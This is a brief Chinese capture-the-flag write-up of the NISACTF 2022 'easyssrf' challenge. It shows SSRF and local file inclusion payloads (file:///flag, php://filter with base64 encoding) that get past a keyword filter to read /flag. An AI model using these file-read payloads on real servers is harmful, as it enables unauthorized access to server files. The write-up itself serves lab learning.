[NISACTF 2022]easyssrf

它提示我们输入 那我们输入file:///flag file:// 访问本地文件系统
它提醒我们输file:///fl4g
它提醒我们输ha1x1ux1u.php
看到代码stristr($file, “file”)当我们输入file它会提示我们输了 啥意思可以前面加个/ 也可以通过read读取 思路都是前面加/不等于flag绕过
file=php://filter/read=convert.base64-encode/resource=/flag 这个需要base64解码
file=php://filter/resource=/flag
file=/flag
[NISACTF 2022]easyssrf_第1张图片[NISACTF 2022]easyssrf_第2张图片
[NISACTF 2022]easyssrf_第3张图片
[NISACTF 2022]easyssrf_第4张图片

你可能感兴趣的:(NSSCTF,网络安全,ctf,NSSCTF)